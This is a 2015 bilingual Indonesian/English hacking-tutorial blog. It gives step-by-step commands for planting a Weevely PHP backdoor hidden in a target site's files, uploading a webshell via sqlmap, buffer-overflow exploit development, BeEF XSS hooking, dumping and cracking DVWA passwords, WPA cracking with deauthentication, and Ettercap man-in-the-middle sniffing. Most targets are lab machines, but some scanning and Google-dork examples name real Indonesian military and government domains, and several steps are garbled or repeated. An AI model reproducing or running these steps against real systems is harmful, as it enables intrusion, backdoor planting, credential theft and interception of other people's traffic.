Senin, 07 September 2015

Make Backdoor with Weevely

1.Once backdoor.php we upload to the web, now we will try to insert a php script that we make with weevely into the web and hide it in php files belonging to the target web.
(Setelah backdoor.php kita upload ke web, sekarang kita akan mencoba untuk memasukkan script php yang kita buat dengan weevely ke web dan menyembunyikannya di file php milik web sasaran)
#weevely generate 1234 pintu.php enter
#ls





2. Copy the script that is in the php file that we created earlier in the php file that is in the target web.
(Salin script yang ada di file php yang kita buat sebelumnya di file php yang ada di web sasaran)
 I will try to insert the script in the view_source_all.php file in the web directory.  
(Saya akan mencoba untuk memasukkan script di file view_source_all.php di direktori web.)
# Weevely http: //url ipaddres target / name backdoor password



Sabtu, 05 September 2015

Digital Forensic

Digital forensics is the science of analyzing digital evidence. Digital evidence is extracted from the electronic evidence such as Personal Computers, mobilephone, notebook, server, any technological tool that has the storage media and can be analyzed.
(Digital forensik adalah ilmu yang menganalisa barang bukti digital. Barang bukti digital merupakan hasil ekstrak dari barang bukti elektronik seperti Personal Komputer, mobilephone, notebook, server, alat teknologi apapun yang mempunyai media penyimpanan dan bisa dianalisa.)

Steps of digital forensic
1. Identification
    means that we chose the thing will identificate with forensic. Example : PC, mobilephone, notebook, flasdisck, server.
2. Preservation
   -chain of custody (to ensure that file when it last changed the owner)
   -labeling
   -imaging/clone
3. Examination
4. Analysis
5. Reporting/produck

The first step is check the position of flasdisk. The goal is to ensure that the data which we will identification. do not let any of the data format the pc itself. If Flasdisck previously been formatted with verascrypt it must be in the format.
1. To find the position of flasdisk which will we identification, open terminal
  #fdisk -l or dmesg enter

2. To reformat the flasdisk from verascypt position to normal position
 #cfdisk /dev/sdb1enter
    -delete
    -new
    -primary
    -write
    -type : yes
    -quite
 #mkfs.fat /dev/sdb1 enter
from command the flasdisk has reformated.

3. Let start to identification the forensic of flasdisk to know what data has been erased and can be read back. (manual ways)
 #fdisk -l
 #testdisk /dev/sdb
   -process
   -intel
   -analisis
   -quick search
   -continue
   -pilih P: list file
red colour : Data that has been erased before and will be in recovery
white colour : Data is still stored in flasdisk 
to check the file has recovered search in root/home directory

4. The next way is an automatic recovery.
#fdisk -l
#photorec /dev/sdb enter
  - enter
previous data will be erased recovery back and immediately stored in a single folder in the home directory namely recup_dir 

 
 
 

Jumat, 04 September 2015

The Function of Veracrypt

Veracrypt in is one of the tools of the linux created as data security and data storage device itself. By Veracrypt we can divide into somes Flasdisk partitions and sort out which ones will be completed with the security Veracrypt where unnecessary.

In safeguards against is file one of them in the process of sending data via email ATW gmail. Where no such thing as a public key and secreat key. The public key serves as a device where others can send encrypted data. Secreat key functions as a device in which only concerned that may lead to the data or the storage device if the object is lost.

Steps of exploitation development

1. Make sure Fuzzing and application error

2. Debug the application and ensure the highest EIP registers by the data that we send

3. Calculate how much of a buffer of bytes to which overwrite EIP register using pattern_crete and pattern_offset

4. Looking for locations for placing the payload (ESP registers in this case, because it took stricken by a buffer which we presume)

5. Search for the address that directs us to the payload For placed on the register of EIP (in this case the address of JMP / CALL ESP)

6. Run fuzzer that contains the address of

2. If the EIP register stricken with the data by the data we send, count how many bytes of the EIP register stricken by using pattern_create and pattern_offset

3. Find the address of JMP ESP / ESP CALL to co-opt the EIP register to STACK / ESP

4. Run Fuzzer and make sure the application leads to the ESP

5. Creating a Simple Payload use msfvenom


1. Lakukan Fuzzing dan pastikan aplikasi error

2. Debug aplikasi dan pastikan register EIP tertinggi oleh data yg kita kirim

3. Hitung byte ke berapa dari buffer yg menimpa register EIP menggunakan pattern_crete dan pattern_offset

4. Mencari lokasi utk meletakan payload (dalam kasus ini register ESP, karena ikut tertimpa oleh buffer yg kita kira)

5.  Mencari alamat yang mengarahkan kita ke payload utk diletakan pada register EIP ( dalam kasus ini alamat dari JMP/CALL ESP )

6. Jalankan fuzzer yang berisi alamat dari

2. Jika register EIP tertimpa dengan data oleh data yang kita kirim, hitung ke byte berapa register EIP tertimpa dengan menggunakan pattern_create dan pattern_offset

3. Cari alamat JMP ESP/CALL ESP utk mengarahkan register EIP ke STACK/ESP

4. Jalankan Fuzzer dan pastikan aplikasi mengarah ke ESP

5. Membuat Simple Payload menggunakan msfvenom
 

            _ _ _ _ _ _ _ _ _ _ _
           I                           I
=============================
DATAA *...?               I  EIP  I   PAYLOAAADD
==============================
                                       I_ _ _ _ _ _ _ _I
                                 jmp/call esp

Kamis, 03 September 2015

Upload Backdoor using Sqlmap (membuat Backdoor dengan Sqlmap)

Before we go to upload backdoor with sqlmap, we must understand it that step at this stage of vulnerability (to get into the database and open password from the server) we have carried out. Then We can move to a new stage by using the backdoor Upload sqlmap.
(sebelum kita melangkah untuk upload backdoor dengan sqlmap, kita harus fahami bahwa langkah pada tahap vulnerability (sampai masuk ke dalam database dan membuka password dari server) telah kita laksanakan. Baru kita dapat melangkah ke tahap Upload backdoor dengan menggunakan sqlmap) 
Cat: Target adalah Metasploit yang ada di dalam virtualbox

1.Open Terminal and make command.
 #cd /usr/share/webshell/php/ enter
 #ls
 #cp php-backdoor.php /root/ enter
 #ls





2.Then back to the terminal at the stage we have entered into the data base of the target. 

We need to remember to upload backdoor through sqlmap stage we carried out, until we actually exist in the target server is one of them into the database and if the database has a password then we have to crack the password we have just carried out upload backdoor with sqlmap.
(Perlu kita ingat untuk tahap upload backdoor melalui sqlmap ini kita laksanakan sampai kita benar-benar ada dalam server target salah satunya masuk ke database dan apabila database tersebut memiliki password maka kita harus crack password tersebut baru kita laksanakan upload backdoor dengan sqlmap)



Rabu, 02 September 2015

Scan using Nikto (Scan dengan Nikto )

1.Using Nikto for scan is very specific so you must first activate Tor on terminal
(Scan dengan menggunakan Nikto sangat spesifik sehingga aktifkan terlebih dahulu Tor pada terminal)
#service tor enter

2.To open Nikto application can from the Applications of Linux and terminal.
(Untuk membuka aplikasi Nikto bisa dari Applications Linux dan terminal)
*Applicatioan: kali linux--web applications--web vulnerability scanner--nikto
*Terminal      : nikto enter

3.To run a scan command
(Untuk menjalankan perintah scan) 
#nikto -host web/alamat url target enter


Scan with SPIDER on Burp Suite. (Scan dengan SPIDER pada Burp Suite )

The function of Spider device is as crawlers will actively and passively doing crawling on the web application to acquire web page data, directories, and even to submit the form and get variables.
(Fungsi dari perangkat Spider ini sebagai crawler yang akan secara aktif dan pasif me- lakukan crawling terhadap web aplikasi untuk mendapatkan data halaman web, direktori, bahkan melakukan submit form dan mendapatkan variabel.)

1. Open web multillidae which displays the login
    (Buka web multillidae yg menampilkan login)


2. Open Burp Suite and enable proxy burp suite. Then fill the log that appears on bupr suite.
(Buka Burp Suite dan aktifkan proxy burp suite. Kemudian isi login sehingga tampil pada bupr suite)


3.Click Proxy - forward - target so it appears the target website. then point to the target. click on right and select spider this branch.
(Klik Proxy--forward--target maka muncul website target. kemudian arahkan kursor ke target. klik kanan pilih spider this branch)


4.To see the results of the scan click on one of the files that will be scanned and click response there will be a description of the file.
(Untuk melihat hasil dari scan klik pada salah satu file yg akan di scan dan klik response maka akan ada keterangan dari file tsb)





Scan with DirBuster (Scan dengan DirBuster)

DirBuster application serves to scan sensitive file and directory that can be used others to deface your website. Examlpe sensitive file and directory : backup, halaman login, log file
(Aplikasi DirBuster ini berfungsi untuk men scan file dan direktory yang sensitif yang dapat dimanfaatkan orang lain untuk mengotori website anda. Contoh file dan directory yg sensitif : buckup, halaman login, log file)

 1. To open the application DirBuster at kali linux:
     (Untuk membuka aplikasi DirBuster pada kali linux )
    Aplications--kali linux--web applications--web crawlers--DirBuster

2. DirBuster function of this is to Brute Force a Directory / file exists in a website.
(Fungsi dari DirBuster ini adalah untuk mem Brute Force suatu Directory/File yang ada di dalam suatu website)
 

3. Enter the url address of the target url target column.
 (Masukan alamat url dari taget ke kolom url target)
   1)Masukan alamat dari url target pada kolom yang sudah disediakan
   2)Browse wordlist DirBuster.
      usr--share--dirbuster--directory-list-2.3-small.txt
   3)Put directory List small when a small target website
      (Masukan directorylist small apabila website target kecil)
   4)Klick start to begin scanning
     (klik start untuk memulai scanin)

1

4. After scannng process
1
 
-The first arrow on the Green colored box .. are some of the directory / file successfully found by dirbuster
(Panah pertama pada kotak berwarna Hijau .. adalah beberapa directory/file yang berhasil di temukan oleh dirbuster)
 
  -The second arrow in the blue box .. is the response of a file / directory that when opened with a browser
(Panah kedua pada kotak berwarna biru .. adalah respon dari file/directory yang jika di buka dengan browser)

  -Red box below is the time taken by dirbuster to do bruteforcing.
(Kotak berwarna merah dibawah adalah waktu yang dibutuhkan oleh dirbuster untuk melakukan bruteforcing)

  -To view the location of shaped Directory and File Tree view just click the icon on the top left corner.

(Untuk melihat letak yang berbentuk Directory dan File tinggal klik icon Tree view pada pojok kiri atas)













Beef applicaton after a web has XSS identification (Aplikasi Beef setelah suatu web teridentifikasi oleh XSS)

If a website has been identificate with XSS then to know the contents of the web, it can use the application Beef.We have to understand beforehand about the web that have been identified XSS. A web can be attacked by XSS by sending scipt or HTML into a site. This attack as if it comes from within the site. As a result of this attack the attacker can obtain sensitive files from it, and of saving the fle dangerous. Below we demonstrated XSS web that has been attacked by creating a script Alert is displayed on the web.
(apabila suatu web telah ter identifikasi dengan XSS maka untuk masuk dan mengetahui isi dari web tersebut maka dapat menggunakan aplikasi Beef. Sebelumnya harus kita fahami tentang web yang sudah teridentifikasi XSS. Suatu web dapat diserang dengan XSS dengan cara mengirimkan scipt atau HTML kedalam suatu situs. Serangan ini seolah olah datang dari dalam situs tersebut. Akibat serangan ini penyerang dapat mendapatkan file yang sensitif dari situ tersebut dan menympan fle berbahaya. Dibawah ini kita contohkan web yang sudah diserang XSS dengan membuat script Alert yang ditampilkan pada web tersebut.)
1. Write Script : <script>alert("horas")</script>

2. After that will appear the word horas in the start of the screen





3. Then open Beef aplication off kali linux
     Application-- kali linux--system service atau

    #beef-xss enter


 4. Then make the script in web target, when the script opened by target, it means the target has deteck in Beef. And we can do as we want in web target.




,


Crack password with JOHN

1.Using metasploitable on virtualbox to enable us make as target. Browse dvwa using IP Target (metasploitable)
http://192.168.56.100/dvwa enter
(Gunakan Metasploitable pada virtualbox yang akan kita buat sbg target. Browsing dvwa dengan menggunakan IP target)


2.Open burpsutie to see the result submit proxy of target which we see through sql injection. Submit the url of target and look up the result in the Burpssuite and copy to file.
(Buka burpsuite untuk melihat hasil proxy yg telah kita lihat melalui sql injection.Masukan alamat url ke kotak submit dan hasil kopi di burpsuite di kopi)

 3.Open the terminal and using the command.
    #sqlmap -l /root/nama file enter
    #sqlmap -l /root/bukapassword.txt enter

4.Using the command to get the database of target.
  #sqlmap -l /root/bukapassword.txt --dbs enter

5.Using command to get the tables one of data base namely dvwa.
  #sqlmap -l /root/bukapassword.txt -D dvwa --tables


6.After we find the table, let to see the columns of dvwa.
 #sqlmap -l /root/bukapassword.txt/ -D dvwa --columns

7.We select the user in dvwa. Use the command up to get the crack of password result.
 # sqlmap -l /root/bukapassword.txt -D dvwa -T users --dump

8.We open the password of user in dvwa with John. Open new terminal to make the cript of user password.Copy the sript password from the terminal previously.

#nano isipassword.py enter 
(file isipassword.py ini kita buat sendiri sbg file yang menyimpan perintah script password user yg kita kopi sebulumnya)

9.Then copy password that existed at the previous terminal

10.Now we use the command to open the password with John
#john --format=raw-md5 isipassword.txt --show






Selasa, 01 September 2015

SQL injection pada web Multiliday ( contoh web target )


Use WPSCAN and JOOMSCAN

1. WPSCAN used to download scanning an IG web when we find the use of the WordPress site where it is one that has a plug-in vulnerability.
(WPSCAN digunakan untuk men scaning suatu web yang pada saat IG kita menemukan penggunaan situs Wordpress dimana ini merupakan salah satu plug in yang memiliki vulnerability)
#wpscan -url tniad.mil.id enter

2. JOOMSCAN is one tool used to metasploit inspect or scan weakness / bug / vurnerability of a website based CMS (Component Management System) Joomla.
(Joomla: a device used in the manufacture of a web)
JOOMSCAN adalah salah satu alat yang digunakan untuk metasploit
memeriksa atau scan kelemahan / bug / vurnerability dari sebuah situs web
berdasarkan CMS (Manajemen Komponen System) Joomla.
(Joomla:suatu perangkat yang digunakan dalam pembuatan sebuah web)

 

Information gathering/IG with Whatweb

1.IG using Whatweb command in linux terminal will help us in the stage of gathering information. Format command:
(IG dengan menggunakan perintah Whatweb di terminal linux akan membantu kita dalam tahap pengumpulan informasi. Format perintah : )
#whatweb knpb.org enter

From the display we can locate servers and web applications used by the target.
(dari display tersebut kita dapat menemukan server dan aplikasi yang digunakan oleh web target.)
contoh : #whatweb -v kopassus.mil.id
arti perintah diatas :
whatweb : perintah untuk mencari informasi tentang web
-v              : peintah agar informasi yang ditampilkan jadi teratur
kopassus : domain/web yang akan dicari informasinya
mil.id       : web tersebut adalah web militer indonesia

Information gathering/IG with Google Hacking

1. Browse Google Hacking

2.Open google and write the format:
    site:mil.id filetype:pdf intext:ujian
   

3. We can also copy the url from google hacking database(GHDB) to google as we need:

4. From the steps of the experiment can get a Web Vulnerability.
(Dari langkah-langkah percobaan tersebut bisa di dapatkan Vulnerability suatu web)

 5.Explaining syntax used in google hacking data base

 
- Site: syntax to limit search query information based on specific sites or domains. For example in information search: site: tniad.mil.id .Pencarian will search for a topic that is available on all pages on the domain tniad.mil.id
- Filetype: syntax on Google for searching the data on the Internet with certain extensions such as doc, pdf or ppt etc. For example in the search: site: go.id filetype: doc intext: password. Then google will find info documents residing on government domains containing the word password
- Intext: syntax searches for words in a particular website. This command ignores links or URLs and page titles. For example: intext: admin, the search will produce a link on a web page that has the keywords that have the keyword admin.
- Index of: can be used to get a site that displays the index directory browsing.


(Penjelasan daari sintaks yang digunakan dalam google hacking data base
 - site : sintaks untuk membatasi informasi permintaan pencarian berdasarkan situs tertentu atau domain. Misalnya dalam pencarian informasi: site: tniad.mil.id .Pencarian akan mencari topik yang tersedia pada semua halaman pada domain tniad.mil.id
-  filetype : sintaks pada Google untuk pencarian data pada internet dengan ekstensi tertentu seperti : doc, pdf atau ppt dll. Misalnya dalam pencarian: site: go.id filetype : doc intext: password. Maka google akan mencari info dokumen yang berada pada domain pemerintahan yang mengandung kata password
- intext : sintaks pencarian untuk kata-kata dalam situs web tertentu. Perintah ini mengabaikan link atau URL dan judul halaman. Sebagai contoh: intext: admin, pencarian akan menghasilkan link pada halaman web yang memiliki kata kunci yang memiliki kata kunci admin.
- Index of : dapat digunakan untuk mendapatkan situs yang menampilkan indeks browsing direktori.)

Senin, 31 Agustus 2015

Wi - Fi Cracking

1.Open a terminal and run
    # airmon-ng start wlan0 enter
    if we ifconfig will display mon0

   (Buka terminal dan jalankan
   #airmon-ng start wlan0 enter
   jika kita ifconfig maka akan muncul mon0)



2.type
   # airodump-ng mon0 enter
   it will display the network that is being run in accordance with each channels

 (Ketik
  #airodump-ng mon0 enter
  maka akan muncul jaringan yang sedang berjalan sesuai dengan channel
  masing-masing)

3.Control C dan ketik
  #airodump-ng -c5 --bssid 94:77:2B:FD:7C:EF -w/tmp/scorpion mon0
4.Buka terminal baru
 #aireplay-ng -0 200 -a 94:77:2B:FD:7C:EF -e scorpion --ignore-negative-one mon0 enter control C.
5.Kembali ke terminal 1
 #airodump-ng -c5 --bssid 94:77:2B:FD:7C:EF -w/tmp/scorpiondump mon0
6.Kontrol C
   #cd /tmp/
   #ls
7.# aircrack-ng scorpiondump-01.cap -w /usr/share/wordlists/metasploit/unix_passwords.txt
 maka password akan ditemukan.

Selanjutnya kita menseting PC kita sebagi Router sehingga saat orang lain yang mengakses jaringan tsb datanya terkirim di PC kita terlebih dahulu.
langkah selanjutnya buka halaman Etter Cat di terminal baru.
1.#ettercap -G enter
klik Sniff---Unified sniffing selanjutnya ketik Wlan0 dan klik ok
2.klik Hosts---Host list
3.Pilih IP: 192.168.1.1 (karena IP ini adalah akses poin). Jadi kita tidak memilih IP orang lain agar orang lain tersebut tidak off.
4.Klik pada IP 192.168.1.1 dan klik add to target 1
5.Klik Mitm---Sniff remote connection klik ok
   maka proses scan akan berjalan kemudian klik sirip warna hijau utk men capture data kemudian stop dan save file
6.Pilih Mitm---stop mitm attack agar proses berhenti tanpa mematikan PC yg sedang berjalan.